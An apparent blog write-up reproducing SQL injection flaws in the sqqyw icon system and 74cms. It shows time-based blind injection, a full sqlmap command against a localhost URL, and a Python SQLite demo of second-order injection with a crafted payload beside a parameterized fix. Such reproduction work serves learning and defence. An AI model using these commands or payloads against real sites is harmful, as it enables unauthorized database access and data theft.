sqqyw (indifferent dot icon system) vulnerability reproduction and 74cms vulnerability reproduction

2022-07-06 14:11:00 Unknown white hat

sqqyw (indifferent dot icon system)

Global keyword search

Search for select

This finds select, but it is not the select of an SQL statement; these matches are the select HTML tag.

Enable the regular-expression and case-insensitive search options

View the contents of the files that contain the variable id

If the text is garbled, change the encoding; switch between GBK and UTF-8.

Run a global search for the ywX function that defines ID

View the contents of the file that contains the ywX function

View the /php/v144.php page

Run a full-text search on the text obtained

Check whether domain is in sohuquan

Trace sohuquan with a full-text search

Get the address of your own website

Trace domain with a full-text search

Modify the source address

id=1

Continue searching the text

Set api==ok, and make sure u, p and id are not empty.

Bypass the check

The statement is executed

Use time-based blind injection to judge the response

Because sleep(3) in the statement was executed three times, the delay is 9 s.

So this is the injection point.

Then simply run the injection with the sqlmap tool

python sqlmap.py -u "http://localhost/sqqyw/php/v144.php?api=ok&u=1&p=1&id=1" --batch -p "id" --current-db

74cms vulnerability reproduction

Conditions for exploiting second-order injection:

insert and update

Controllable variables

Enter the member center

Sign in / register

Create a new resume

Turn on MySQL monitoring

Set the break point, then update

Save and monitor

The update statement here is unrelated to what we inserted: its values are not written by us but are the numbers the system matched for the corresponding fields, so it cannot be used.

Continue to save and monitor

The data in the insert is what we selected from the options, not what we typed in, so it cannot be used.

Again, save and monitor

This one is updated directly with update, with no insert, so it cannot be used either.

Again, continue to save and monitor

Here there are both insert and update, and the variables are controllable

So we can query the user name through second-order injection

Filtering at insert time has little effect, as long as there is no filtering at update time.

Resume management
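
Why filtering at insert time does not help when the later update is unfiltered, shown as an added example that is not from the original post or from 74cms. It uses an in-memory SQLite database with hypothetical table and column names (members, education, resume) and a constructed input value, and puts the unfiltered update beside a parameterized one.

```python
import sqlite3

# Constructed sample value; table and column names are hypothetical, not 74cms's schema.
STORED_INPUT = "x', fullname=(SELECT username FROM members WHERE uid=2) WHERE uid=1 --"

def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE members(uid INTEGER PRIMARY KEY, username TEXT);
        CREATE TABLE education(uid INTEGER, school TEXT);
        CREATE TABLE resume(uid INTEGER PRIMARY KEY, fullname TEXT, education_cn TEXT);
        INSERT INTO members VALUES (1, 'tester'), (2, 'admin');
        INSERT INTO resume VALUES (1, 'Test User', '');
    """)
    return db

def save_education(db, uid, school):
    # Step 1 (insert): bound parameter, so the quote characters are stored verbatim.
    db.execute("INSERT INTO education(uid, school) VALUES (?, ?)", (uid, school))

def sync_resume_vulnerable(db, uid):
    # Step 2 (update): the value is read back from the database, treated as
    # trusted, and concatenated into the statement without filtering.
    (school,) = db.execute("SELECT school FROM education WHERE uid=?", (uid,)).fetchone()
    db.execute("UPDATE resume SET education_cn='%s' WHERE uid=%d" % (school, uid))

def sync_resume_fixed(db, uid):
    # Same update with bound parameters: stored data can never become SQL syntax.
    (school,) = db.execute("SELECT school FROM education WHERE uid=?", (uid,)).fetchone()
    db.execute("UPDATE resume SET education_cn=? WHERE uid=?", (school, uid))

def run(sync):
    # Store the value, run the chosen update path, return what the resume page would show.
    db = new_db()
    save_education(db, 1, STORED_INPUT)
    sync(db, 1)
    return db.execute("SELECT fullname, education_cn FROM resume WHERE uid=1").fetchone()

if __name__ == "__main__":
    print("vulnerable:", run(sync_resume_vulnerable))
    print("fixed:     ", run(sync_resume_fixed))
```

With the unfiltered update, the fullname column ends up holding another member's user name; with the parameterized update the stored text stays inert data in education_cn.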
